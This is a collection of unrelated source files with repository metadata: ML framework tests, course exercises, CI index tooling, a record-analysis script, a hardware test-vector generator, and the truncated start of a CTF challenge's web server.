max_issues_count: 1 (2021-06-16T08:37:50.000Z to 2021-06-16T08:37:50.000Z) | issues repo: duijiudanggecl/oneflow @ d2096ae14cf847509394a3b717021e2bd1d72f62 | licenses: ["Apache-2.0"]
max_forks_count: 1 (2021-11-10T07:57:01.000Z to 2021-11-10T07:57:01.000Z) | forks repo: duijiudanggecl/oneflow @ d2096ae14cf847509394a3b717021e2bd1d72f62 | licenses: ["Apache-2.0"]
content:
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
import numpy as np
import oneflow.typing as tp
from test_util import GenArgList
import unittest
from collections import OrderedDict
from typing import Dict
import os
def _compare_l1loss_with_np(
input_shape, target_shape, device_type, machine_ids, device_counts
):
input = np.random.random(size=input_shape).astype(np.float32)
target = np.random.random(size=target_shape).astype(np.float32)
assert device_type in ["cpu", "gpu"]
func_config = flow.FunctionConfig()
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_counts)
else:
flow.config.gpu_device_num(device_counts)
func_config.default_placement_scope(flow.scope.placement(device_type, machine_ids))
func_config.default_logical_view(flow.scope.consistent_view())
def np_l1loss(np_input, np_target):
np_l1 = np.abs(np_target - np_input)
np_l1_mean = np.mean(np_l1)
np_l1_sum = np.sum(np_l1)
np_l1_dict = {
"np_l1_loss": np_l1,
"np_l1_loss_mean": np_l1_mean,
"np_l1_loss_sum": np_l1_sum,
}
return np_l1_dict
def np_l1_loss_diff(np_input, np_target):
# Use numpy to compute diff
original_shape = np_target.shape
elemcnt = np_target.size
prediction = np_input.reshape(-1)
label = np_target.reshape(-1)
prediction_grad = np.zeros((elemcnt)).astype(prediction.dtype)
for i in np.arange(elemcnt):
diff = prediction[i] - label[i]
prediction_grad[i] = np.sign(diff)
grad_mean = prediction_grad.reshape(original_shape) / elemcnt
        # TODO: if you want to get the grad when the reduction = "sum", you can use the following code
# grad_sum = prediction_grad.reshape(original_shape)
grad_dict = {
"np_grad_mean": grad_mean,
}
return grad_dict
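    # Math note for the helper above: with L = mean(|x - t|) over N elements,
    # dL/dx_i = sign(x_i - t_i) / N, which is exactly what np_grad_mean holds.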
# Use Numpy to compute l1 loss
np_out_l1loss_dict = np_l1loss(input, target)
# Use Numpy to compute l1 grad
np_grad_dict = np_l1_loss_diff(input, target)
def assert_prediction_grad(blob: tp.Numpy):
# Evaluate the gradient. Here we only test the reduction type == "mean"
assert np.allclose(blob, np_grad_dict["np_grad_mean"])
@flow.global_function(type="train", function_config=func_config)
def oneflow_l1loss(
of_input: tp.Numpy.Placeholder(shape=input.shape),
of_target: tp.Numpy.Placeholder(shape=target.shape),
) -> Dict[str, tp.Numpy]:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=target.shape,
dtype=flow.float32,
initializer=flow.constant_initializer(0),
name="v",
)
x_var = of_input + v
# watch the diff
flow.watch_diff(x_var, assert_prediction_grad)
l1loss = flow.nn.L1Loss(x_var, of_target, reduction="none", name="of_l1loss")
l1loss_mean = flow.nn.L1Loss(
x_var, of_target, reduction="mean", name="of_l1loss_mean"
)
l1loss_sum = flow.nn.L1Loss(
x_var, of_target, reduction="sum", name="of_l1loss_sum"
)
with flow.scope.placement(device_type, "0:0"):
# We only test reduction="mean" diff
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [1e-3]), momentum=0
).minimize(l1loss_mean)
return {
"of_l1_loss": l1loss,
"of_l1_loss_mean": l1loss_mean,
"of_l1_loss_sum": l1loss_sum,
}
of_out_l1loss_dict = oneflow_l1loss(input, target)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss"], np_out_l1loss_dict["np_l1_loss"]
)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss_mean"][0], np_out_l1loss_dict["np_l1_loss_mean"]
)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss_sum"][0], np_out_l1loss_dict["np_l1_loss_sum"]
)
def _gen_arg_dict(shape, device_type, machine_ids, device_counts):
# Generate a dict to pass parameter to test case
arg_dict = OrderedDict()
arg_dict["input_shape"] = [shape]
arg_dict["target_shape"] = [shape]
arg_dict["device_type"] = [device_type]
arg_dict["machine_ids"] = [machine_ids]
arg_dict["device_counts"] = [device_counts]
return arg_dict
@flow.unittest.skip_unless_1n1d()
class Testl1loss1n1d(flow.unittest.TestCase):
def test_l1loss_cpu(test_case):
arg_dict = _gen_arg_dict(
shape=(16, 3), device_type="cpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_l1loss_gpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16, 32), device_type="gpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
@flow.unittest.skip_unless_1n2d()
class Testl1loss1n2d(flow.unittest.TestCase):
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_l1loss_gpu_1n2d(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 32, 16), device_type="gpu", machine_ids="0:0-1", device_counts=2
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
if __name__ == "__main__":
unittest.main()
avg_line_length: 33.540984 | max_line_length: 99 | alphanum_fraction: 0.665689
--- record ---
hexsha: 865144cd196eb39a73555fc643c117d083a615cc | size: 744 | ext: py | lang: Python
path: Buta Nicolae/threads.py | repo: RazvanBalau/parallel-2020 @ bd9c0dea6cc70e167320f64632d7a235522dfdb3 | licenses: ["MIT"] (same for stars/issues/forks)
max_stars_count: null | max_issues_count: null | max_forks_count: 23 (2020-01-15T15:02:39.000Z to 2020-01-15T17:23:03.000Z)
content:
import threading
from multiprocessing import Queue
results = []
results2 = []
def take_numbers(q):
print('Enter the numbers:')
for i in range(0,3):
num1 = int(input('Enter first number: '))
num2 = int(input('Enter second number: '))
q.put(num1)
q.put(num2)
def add_num(q):
for i in range(0,3):
num1 = q.get()
num2 = q.get()
results.append(num1+num2)
results2.append(num1-num2)
q = Queue()
t2 = threading.Thread(target=add_num, args=(q, ))
t1 = threading.Thread(target=take_numbers, args=(q, ))
t2.start()
t1.start()
t2.join()
t1.join()
q.close()
for result in results:
    print("addition =", result)
for result in results2:
    print("subtraction =", result)
avg_line_length: 20.666667 | max_line_length: 54 | alphanum_fraction: 0.606183
--- record ---
hexsha: d4c7b73306f8c0594f64a791f8292624d0ac8d82 | size: 11,237 | ext: py | lang: Python
path: Tests/Marketplace/prepare_public_index_for_private_testing.py | repo: diCagri/content @ c532c50b213e6dddb8ae6a378d6d09198e08fc9f | licenses: ["MIT"] (same for stars/issues/forks)
max_stars_count: 799 (2016-08-02T06:43:14.000Z to 2022-03-31T11:10:11.000Z) | max_issues_count: 9,317 (2016-08-07T19:00:51.000Z to 2022-03-31T21:56:04.000Z) | max_forks_count: 1,297 (2016-08-04T13:59:00.000Z to 2022-03-31T23:43:06.000Z)
content:
import time
import os
import sys
import shutil
import json
import argparse
from zipfile import ZipFile
from contextlib import contextmanager
from datetime import datetime
from Tests.private_build.upload_packs_private import download_and_extract_index, update_index_with_priced_packs, \
extract_packs_artifacts
from Tests.Marketplace.marketplace_services import init_storage_client
from Tests.scripts.utils.log_util import install_logging
from Tests.scripts.utils import logging_wrapper as logging
MAX_SECONDS_TO_WAIT_FOR_LOCK = 600
LOCK_FILE_PATH = 'lock.txt'
@contextmanager
def lock_and_unlock_dummy_index(public_storage_bucket, dummy_index_lock_path):
try:
acquire_dummy_index_lock(public_storage_bucket, dummy_index_lock_path)
yield
except Exception:
logging.exception("Error in dummy index lock context manager.")
finally:
release_dummy_index_lock(public_storage_bucket, dummy_index_lock_path)
def change_pack_price_to_zero(path_to_pack_metadata):
with open(path_to_pack_metadata, 'r') as pack_metadata_file:
pack_metadata = json.load(pack_metadata_file)
pack_metadata['price'] = 0
with open(path_to_pack_metadata, 'w') as pack_metadata_file:
json.dump(pack_metadata, pack_metadata_file, indent=4)
def change_packs_price_to_zero(public_index_folder_path):
paths_to_packs_in_merged_index = [pack_dir.path for pack_dir in os.scandir(public_index_folder_path) if
pack_dir.is_dir()]
for path_to_pack in paths_to_packs_in_merged_index:
path_to_pack_metadata = os.path.join(path_to_pack, 'metadata.json')
change_pack_price_to_zero(path_to_pack_metadata)
def merge_private_index_into_public_index(public_index_folder_path, private_index_folder_path):
packs_in_private_index = [pack_dir.name for pack_dir in os.scandir(private_index_folder_path) if pack_dir.is_dir()]
for pack_name in packs_in_private_index:
path_to_pack_in_private_index = os.path.join(private_index_folder_path, pack_name)
path_to_pack_in_public_index = os.path.join(public_index_folder_path, pack_name)
shutil.copy(path_to_pack_in_private_index, path_to_pack_in_public_index)
def upload_modified_index(public_index_folder_path, extract_destination_path, public_ci_dummy_index_blob, build_number,
private_packs):
"""Upload updated index zip to cloud storage.
Args:
public_index_folder_path (str): public index folder full path.
extract_destination_path (str): extract folder full path.
public_ci_dummy_index_blob (Blob): google cloud storage object that represents the dummy index.zip blob.
build_number (str): circleCI build number, used as an index revision.
private_packs (list): List of private packs and their price.
"""
with open(os.path.join(public_index_folder_path, "index.json"), "w+") as index_file:
for private_pack in private_packs:
private_pack['price'] = 0
index = {
'revision': build_number,
'modified': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'packs': private_packs
}
json.dump(index, index_file, indent=4)
index_zip_name = os.path.basename(public_index_folder_path)
index_zip_path = shutil.make_archive(base_name=public_index_folder_path, format="zip",
root_dir=extract_destination_path, base_dir=index_zip_name)
try:
public_ci_dummy_index_blob.reload()
public_ci_dummy_index_blob.cache_control = "no-cache,max-age=0" # disabling caching for index blob
public_ci_dummy_index_blob.upload_from_filename(index_zip_path)
logging.success("Finished uploading index.zip to storage.")
except Exception:
logging.exception("Failed in uploading index. Mismatch in index file generation.")
sys.exit(1)
finally:
shutil.rmtree(public_index_folder_path)
def option_handler():
"""Validates and parses script arguments.
Returns:
Namespace: Parsed arguments object.
"""
parser = argparse.ArgumentParser(description="Store packs in cloud storage.")
# disable-secrets-detection-start
parser.add_argument('-b', '--public_bucket_name', help="CI public bucket name", required=True)
parser.add_argument('-pb', '--private_bucket_name', help="CI private bucket name", required=True)
parser.add_argument('-s', '--service_account',
help=("Path to gcloud service account, is for circleCI usage. "
"For local development use your personal account and "
"authenticate using Google Cloud SDK by running: "
"`gcloud auth application-default login` and leave this parameter blank. "
"For more information go to: "
"https://googleapis.dev/python/google-api-core/latest/auth.html"),
required=False)
parser.add_argument('-n', '--ci_build_number',
help="CircleCi build number (will be used as hash revision at index file)", required=True)
parser.add_argument('-e', '--extract_public_index_path', help="Full path of folder to extract the public index",
required=True)
parser.add_argument('-sb', '--storage_base_path', help="Storage base path of the directory to upload to.",
required=False)
parser.add_argument('-p', '--pack_name', help="Modified pack to upload to gcs.")
parser.add_argument('-a', '--artifacts_path', help="The full path of packs artifacts", required=True)
parser.add_argument('-ea', '--extract_artifacts_path', help="Full path of folder to extract wanted packs",
required=True)
parser.add_argument('-di', '--dummy_index_dir_path', help="Full path to the dummy index in the private CI bucket",
required=True)
# disable-secrets-detection-end
return parser.parse_args()
def is_dummy_index_locked(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
return dummy_index_lock_blob.exists()
def lock_dummy_index(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
with open(LOCK_FILE_PATH, 'w') as lock_file:
lock_file.write('locked')
with open(LOCK_FILE_PATH, 'rb') as lock_file:
dummy_index_lock_blob.upload_from_file(lock_file)
def acquire_dummy_index_lock(public_storage_bucket, dummy_index_lock_path):
total_seconds_waited = 0
while is_dummy_index_locked(public_storage_bucket, dummy_index_lock_path):
if total_seconds_waited >= MAX_SECONDS_TO_WAIT_FOR_LOCK:
logging.critical("Error: Failed too long to acquire lock, exceeded max wait time.")
sys.exit(1)
if total_seconds_waited % 60 == 0:
# Printing a message every minute to keep the machine from dying due to no output
logging.info("Waiting to acquire lock.")
total_seconds_waited += 10
time.sleep(10)
lock_dummy_index(public_storage_bucket, dummy_index_lock_path)
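# Illustrative timeline for the polling above: while another build holds
# lock.txt, this build sleeps in 10-second steps and logs once per minute; it
# gives up via sys.exit(1) once MAX_SECONDS_TO_WAIT_FOR_LOCK (600 seconds) is
# reached, otherwise it uploads its own lock.txt and proceeds.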
def release_dummy_index_lock(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
dummy_index_lock_blob.delete()
os.remove(LOCK_FILE_PATH)
def add_private_packs_from_dummy_index(private_packs, dummy_index_blob):
downloaded_dummy_index_path = 'current_dummy_index.zip'
extracted_dummy_index_path = 'dummy_index'
dummy_index_json_path = os.path.join(extracted_dummy_index_path, 'index', 'index.json')
dummy_index_blob.download_to_filename(downloaded_dummy_index_path)
os.mkdir(extracted_dummy_index_path)
if os.path.exists(downloaded_dummy_index_path):
with ZipFile(downloaded_dummy_index_path, 'r') as index_zip:
index_zip.extractall(extracted_dummy_index_path)
with open(dummy_index_json_path) as index_file:
index_json = json.load(index_file)
packs_from_dummy_index = index_json.get('packs', [])
for pack in private_packs:
is_pack_in_dummy_index = any(
[pack['id'] == dummy_index_pack['id'] for dummy_index_pack in packs_from_dummy_index])
if not is_pack_in_dummy_index:
packs_from_dummy_index.append(pack)
os.remove(downloaded_dummy_index_path)
shutil.rmtree(extracted_dummy_index_path)
return packs_from_dummy_index
def main():
install_logging('prepare_public_index_for_private_testing.log', logger=logging)
upload_config = option_handler()
service_account = upload_config.service_account
build_number = upload_config.ci_build_number
public_bucket_name = upload_config.public_bucket_name
private_bucket_name = upload_config.private_bucket_name
storage_base_path = upload_config.storage_base_path
extract_public_index_path = upload_config.extract_public_index_path
changed_pack = upload_config.pack_name
extract_destination_path = upload_config.extract_artifacts_path
packs_artifacts_path = upload_config.artifacts_path
dummy_index_dir_path = upload_config.dummy_index_dir_path
dummy_index_path = os.path.join(dummy_index_dir_path, 'index.zip')
dummy_index_lock_path = os.path.join(dummy_index_dir_path, 'lock.txt')
storage_client = init_storage_client(service_account)
public_storage_bucket = storage_client.bucket(public_bucket_name)
private_storage_bucket = storage_client.bucket(private_bucket_name)
dummy_index_blob = public_storage_bucket.blob(dummy_index_path)
with lock_and_unlock_dummy_index(public_storage_bucket, dummy_index_lock_path):
extract_packs_artifacts(packs_artifacts_path, extract_destination_path)
public_index_folder_path, public_index_blob, _ = download_and_extract_index(public_storage_bucket,
extract_public_index_path, storage_base_path)
# In order for the packs to be downloaded successfully, their price has to be 0
change_packs_price_to_zero(public_index_folder_path)
private_packs, private_index_path, private_index_blob = update_index_with_priced_packs(private_storage_bucket,
extract_destination_path,
public_index_folder_path,
changed_pack, True,
storage_base_path)
private_packs = add_private_packs_from_dummy_index(private_packs, dummy_index_blob)
upload_modified_index(public_index_folder_path, extract_public_index_path, dummy_index_blob, build_number,
private_packs)
if __name__ == '__main__':
main()
avg_line_length: 48.021368 | max_line_length: 129 | alphanum_fraction: 0.707128
--- record ---
hexsha: be04c82cd5f62929d01752841a8ec17a1254d468 | size: 291 | ext: py | lang: Python
path: exercises/pt/exc_01_03_01.py | repo: Jette16/spacy-course @ 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | licenses: ["MIT"] (same for stars/issues/forks)
max_stars_count: 2,085 (2019-04-17T13:10:40.000Z to 2022-03-30T21:51:46.000Z) | max_issues_count: 79 (2019-04-18T14:42:55.000Z to 2022-03-07T08:15:43.000Z) | max_forks_count: 361 (2019-04-17T13:34:32.000Z to 2022-03-28T04:42:45.000Z)
content:
# Import the English language class and create an nlp object
from ____ import ____
nlp = ____
# Process the text
doc = ____("I like tree kangaroos and narwhals.")
# Select the first token
first_token = doc[____]
# Print the first token's text
print(first_token.____)
avg_line_length: 22.384615 | max_line_length: 69 | alphanum_fraction: 0.75945
--- record ---
hexsha: 0775eae440b3ed8a8de73f26dfbbc57343a6323d | size: 6,670 | ext: py | lang: Python
path: text_selection/analyse_zenon_scrape.py | repo: dainst/chronoi-corpus-processing @ 7f508a7572e1022c4c88d1477db029e6619a1f0c | licenses: ["MIT"] (same for stars/issues/forks)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import csv
import furl
import json
import re
import sys
from collections import defaultdict
def filter_records_without_url(records: []) -> []:
return [r for r in records if any(r.get("urls"))]
def build_furl(url: str) -> furl.furl:
try:
furl_obj = furl.furl(url)
if not furl_obj.host:
furl_obj = furl.furl("http://" + url)
return furl_obj
except ValueError:
return furl.furl("https://invalid-url.xyz")
def determine_host(url: str) -> str:
furl_obj = build_furl(url)
return re.sub(r"^www[0-9]*\.", "", furl_obj.host)
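# Examples (illustrative): determine_host("www2.example.org/x") and
# determine_host("example.org") both yield "example.org"; an unparseable value
# falls back to the dummy host "invalid-url.xyz" via build_furl.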
def build_hosts_to_urls(records: []) -> {str: {str}}:
result = defaultdict(set)
for record in records:
for url in record.get("urls"):
host = determine_host(url.get("url"))
result[host].add(url.get("url"))
return result
def print_most_common_url_hosts(hosts_to_urls: {}, n: int):
hosts = [h for h in hosts_to_urls.keys() if len(hosts_to_urls[h]) > n]
hosts = sorted(hosts, key=lambda h: len(hosts_to_urls[h]))
for host in hosts:
print("% 6d\t%s" % (len(hosts_to_urls[host]), host))
def print_urls_for_host(hosts_to_urls: {}, host: str):
urls = hosts_to_urls.get(host, [])
for url in urls:
print(url)
if not any(urls):
print(f"No urls for host: '{host}'", file=sys.stderr)
def print_how_often_url_patterns_cooccur(records: [{}], pattern1: str, pattern2: str):
    # It should be ok to pattern-match only the hosts here...
ids1 = {r.get("id") for r in records if record_has_matching_url(r, pattern1)}
ids2 = {r.get("id") for r in records if record_has_matching_url(r, pattern2)}
ids_both = ids1.intersection(ids2)
for host, number in {pattern1: len(ids1), pattern2: len(ids2), "both": len(ids_both)}.items():
print(f"{host}: {number}")
def record_has_matching_url(record: {}, pattern: str) -> bool:
return any(record_get_urls_matching(record, pattern))
def record_get_urls_matching(record: {}, pattern: str) -> [{}]:
result = []
for url in record.get("urls"):
if any(re.findall(pattern, url.get("url"))):
result.append(url)
return result
def record_remove_urls_not_matching(record: {}, pattern: str):
record["urls"] = record_get_urls_matching(record, pattern)
def earliest_year(year_strings: [str]) -> str:
years = []
for year_s in year_strings:
try:
years.append(int(year_s))
except ValueError:
print(f"Not a string that is a year: '{year_s}'", file=sys.stderr)
continue
return str(sorted(years)[0]) if any(years) else ""
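# Example (illustrative): earliest_year(["2003", "1999", "n.d."]) warns about
# "n.d." on stderr and returns "1999"; with no parseable years it returns "".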
def main(args: argparse.Namespace):
with open(args.scrape_file, "r") as file:
records = json.load(file)
records = filter_records_without_url(records)
# filter urls by the user-provided filter list
if args.desc_filters:
with open(args.desc_filters, "r") as file:
filters = file.read().splitlines()
for record in records:
record["urls"] = [url for url in record.get("urls") if url.get("desc") not in filters]
records = filter_records_without_url(records)
# print unique hosts or urls, then exit
if args.print_host_urls or args.print_common_hosts >= 0:
hosts_to_urls = build_hosts_to_urls(records)
if args.print_common_hosts >= 0:
print_most_common_url_hosts(hosts_to_urls, n=args.print_common_hosts)
elif args.print_host_urls:
print_urls_for_host(hosts_to_urls, host=args.print_host_urls)
exit(0)
# check in how many records the two given hosts co-occur, then exit
if args.patterns_cooccur:
host1, host2 = args.patterns_cooccur.split(",")
print_how_often_url_patterns_cooccur(records, host1, host2)
exit(0)
# do some selection based on a url pattern, remove all non-matching urls from the record
if args.select_by_url:
pattern = args.select_by_url
records = [r for r in records if record_has_matching_url(r, pattern)]
for record in records:
record_remove_urls_not_matching(record, pattern)
# sort the records by id, to be extra sure, that we get the same order every time this is called
# print each line as a csv column
records = sorted(records, key=lambda r: r.get("id"))
writer = csv.writer(sys.stdout, delimiter=",", quoting=csv.QUOTE_ALL)
for record in records:
to_print = []
if args.print_id:
to_print.append(record.get("id", ""))
if args.print_url:
to_print.append(record.get("urls")[0].get("url") if any(record.get("urls")) else "")
if args.print_pub_date:
to_print.append(earliest_year(record.get("publicationDates", [])))
if args.print_languages:
to_print.append("|".join(record.get("languages", [])))
writer.writerow(to_print)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Process a file with zenon json records and print some information about them.")
parser.add_argument("scrape_file", type=str, help="The file that contains the zenon dumps as json.")
parser.add_argument("--desc-filters", type=str, help="A file to filter urls by. Excludes urls with 'desc' fields matching a line in the file.")
# these are arguments to print some specific information
parser.add_argument("--print-common-hosts", type=int, default=-1, help="Print hosts that appear more than n times in the records urls, then exit.")
parser.add_argument("--print-host-urls", type=str, help="Print all urls for the host, then exit.")
parser.add_argument("--patterns-cooccur", type=str, help="Format: 'pattern1,pattern2', print how often these occur in single records url fields, then exit.")
# these are meant to work together select by a url pattern then print information about the records
parser.add_argument("--select-by-url", type=str, help="Give a pattern for a url to select records by.")
parser.add_argument("--print-url", action="store_true", help="Print the first of each urls for the selected records. (Ignores other urls present on the records if --select-url is given.)")
parser.add_argument("--print-pub-date", action="store_true", help="Print the earliest publication year for each of the selected records.")
parser.add_argument("--print-id", action="store_true", help="Print the selected records' ids")
parser.add_argument("--print-languages", action="store_true", help="Print the selected records' languages")
main(parser.parse_args())
avg_line_length: 40.670732 | max_line_length: 192 | alphanum_fraction: 0.669715
--- record ---
hexsha: 07a919ed87f13258649cbf2c9c6e2971a4de419e | size: 5,568 | ext: py | lang: Python
path: AI_Engine_Development/Feature_Tutorials/07-AI-Engine-Floating-Point/Utils/GenerationLib.py | repo: jlamperez/Vitis-Tutorials @ 9a5b611caabb5656bbb2879116e032227b164bfd | licenses: ["Apache-2.0"] (same for stars/issues/forks)
max_stars_count: 1 (2022-03-09T06:15:43.000Z to 2022-03-09T06:15:43.000Z) | max_issues_count: null | max_forks_count: null
content:
#
# Copyright 2020–2021 Xilinx, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from math import *
import random
def GenerateTestVector(dtval,pliow,NPhases_s,NStreams_s,NSamples_s,NFrames_s,SeqType_s,Basename_s):
print('DtVal : ',dtval.get())
print('PLIO width : ',pliow.get())
print('NPhases : ',NPhases_s.get())
print('NStreams : ',NStreams_s.get())
print('NSamples : ',NSamples_s.get())
print('NFrames : ',NFrames_s.get())
print('Type of Sequence : ',SeqType_s.get())
print('Base filename : ',Basename_s.get())
NPhases = int(NPhases_s.get())
NStreams = int(NStreams_s.get())
LFrame = int(NSamples_s.get())
NFrames = int(NFrames_s.get())
SequenceType = SeqType_s.get()
Basename = Basename_s.get()
#parameters that should be in the GUI
# SequenceType ='Linear' # 'SinCos' 'Linear' 'Random' 'Dirac'
# Basename = 'PhaseIn'
NSamples = NPhases*NStreams*LFrame*NFrames;
NSamples1 = NPhases*NStreams*LFrame*(NFrames+1); # A little longer to allow for delay in streams
NBitsData = 32;
if( dtval.get() == 'int16'):
NBitsData = 16
HasImag = 0
if (dtval.get() == 'cint16'):
HasImag = 1
if(SequenceType != 'SinCos' and SequenceType != 'Linear' and SequenceType != 'Random' and SequenceType != 'Dirac'):
print ('Unknown Sequence Type')
return
# Create the overall signal that will be distributed over all streams
# it is already separated in phases
S = np.zeros((NPhases,int(NSamples1/NPhases),1+HasImag))
for i in range(int(NSamples1/NPhases)):
for p in range (NPhases):
k = i*NPhases+p
if (SequenceType == 'SinCos'):
vr = int(5000*cos(6.28*5/(NPhases*NStreams*LFrame)*k))
vi = int(5000*sin(6.28*5/(NPhases*NStreams*LFrame)*k))
elif (SequenceType == 'Linear'):
vr = k
vi = -k
elif (SequenceType == 'Random'):
vr = random.randint(-5000,5000)
vi = random.randint(-5000,5000)
elif (SequenceType == 'Dirac'):
vr = 0
vi = 0
if(k%151 == 1):
vr = 1
elif(k%151 == 40):
vi = 1
elif(k%151 == 81):
vr = 2
elif(k%151 == 115):
vi = -2
# if(k%311 == 50):
# vr = 1
# S[p,i,0] =
# if(HasImag==1):
# S[p,i,1] = int(5000*sin(6.28*5/(NPhases*NStreams*LFrame)*k))
S[p,i,0] = vr
if (HasImag == 1 ):
S[p,i,1] = vi
PLIOwidth = int(pliow.get())
NSamplesPerLine = int(PLIOwidth/NBitsData) # Data are read in blocks of 128 bits (4 data in cint16)
# Create an Input test Vector in TestInputS.txt
FileNames = [];
# Easiest case: 1 stream per AI Engine
if (NStreams == 1):
#Creates list of filenames
for Phi in range(NPhases):
FileNames.append(Basename+'_'+str(Phi)+'.txt')
#Open all files
fds = [open(path, 'w') for path in FileNames]
#Fill all files with the right data
for p in range(NPhases):
fd = fds[p]
for s in range(int(NSamples1/NPhases/NSamplesPerLine)):
for d in range(NSamplesPerLine):
index = s*NSamplesPerLine + d
fd.write(str(int(S[p,index,0]))+' ')
if(HasImag):
fd.write(str(int(S[p,index,1]))+' ')
fd.write('\n')
for fd in fds:
fd.close()
if (NStreams == 2):
#Creates list of filenames
for Phi in range(NPhases):
for Stream in range(NStreams):
FileNames.append('PhaseIn_'+str(Phi)+'_'+str(Stream)+'.txt')
# Hash table to associate data to streams
NSamplesIn128bits = int(128/NBitsData )
H = np.zeros((int(NSamples1/NPhases/2),2))
H = H.astype('int32')
index = np.zeros(2)
index = index.astype('int32')
for s in range(int(NSamples1/NPhases)):
k = int(s/NSamplesIn128bits) # Block order
i = k%2 # Which streams
H[index[i],i] = s
index[i] = index[i]+1
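        # The loop above distributes whole 128-bit blocks round-robin over the
        # two streams: block k goes to stream k % 2, so column i of H lists, in
        # order, the sample indices carried by stream i.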
#Open all files
fds = [open(path, 'w') for path in FileNames]
#Fill all files with the right data
for p in range(NPhases):
for stream in range(2):
fd = fds[2*p+stream]
for s in range(int(NSamples1/NPhases/NSamplesPerLine/NStreams)):
for d in range(NSamplesPerLine):
index = s*NSamplesPerLine + d
fd.write(str(int(S[p,H[index,stream],0]))+' ')
if(HasImag):
fd.write(str(int(S[p,H[index,stream],1]))+' ')
fd.write('\n')
for fd in fds:
fd.close()
| 33.341317 | 119 | 0.541667 |
9c5ca9cec48517b47b0e018883a0875e922d1924
| 4,921 |
py
|
Python
|
2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py
|
iicarus-bit/google-ctf
|
4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b
|
[
"Apache-2.0"
] | 2,757 |
2018-04-28T21:41:36.000Z
|
2022-03-29T06:33:36.000Z
|
2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py
|
iicarus-bit/google-ctf
|
4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b
|
[
"Apache-2.0"
] | 20 |
2019-07-23T15:29:32.000Z
|
2022-01-21T12:53:04.000Z
|
2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py
|
iicarus-bit/google-ctf
|
4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b
|
[
"Apache-2.0"
] | 449 |
2018-05-09T05:54:05.000Z
|
2022-03-30T14:54:18.000Z
|
#!/usr/bin/env python3
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from aiohttp import web
import capstone
import functools
from gdbproc import GDBProcess
import socketio
import asyncio
import codecs
import os
enable_logging = False
premium = 'PREMIUM' in os.environ
if premium:
access_key = os.getenv('PREMIUM_KEY')
runnable = ['/home/user/printwebflag']
else:
access_key = os.getenv('TRIAL_KEY')
runnable = ['/bin/sleep', '20']
MAX_INSN_LEN = 15
capstone_md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
sio = socketio.AsyncServer()
app = web.Application()
sio.attach(app)
with open('index.html') as f:
index_html = f.read()
async def index(request):
if not 'key' in request.cookies:
return web.Response(status=401, text='permission denied (missing key)', content_type='text/html')
if request.cookies['key'] != access_key:
return web.Response(status=401, text='permission denied (invalid key)', content_type='text/html')
return web.Response(text=index_html, content_type='text/html')
app.add_routes([web.get('/', index),
web.get('/{name}', index)])
gdb_sessions = {}
stop_queue_readers = {}
async def on_shutdown(app):
    # gather() needs the awaitables unpacked; a bare generator is not awaitable
    await asyncio.gather(*(delete_gdb_process(sid) for sid in gdb_sessions.keys()))
app.on_shutdown.append(on_shutdown)
def log(msg):
if enable_logging:
print('[*] {}'.format(msg))
@sio.on('connect')
def connect(sid, environ):
log('connected {}'.format(sid))
if not 'key={}'.format(access_key) in environ['HTTP_COOKIE']:
log('access_key not found {}'.format(environ['HTTP_COOKIE']))
return False
@sio.on('disconnect')
async def disconnect(sid):
log('disconnected {}'.format(sid))
await delete_gdb_process(sid)
async def stop_queue_reader(sid, queue):
while True:
pkt = await queue.get()
await update_all(sid)
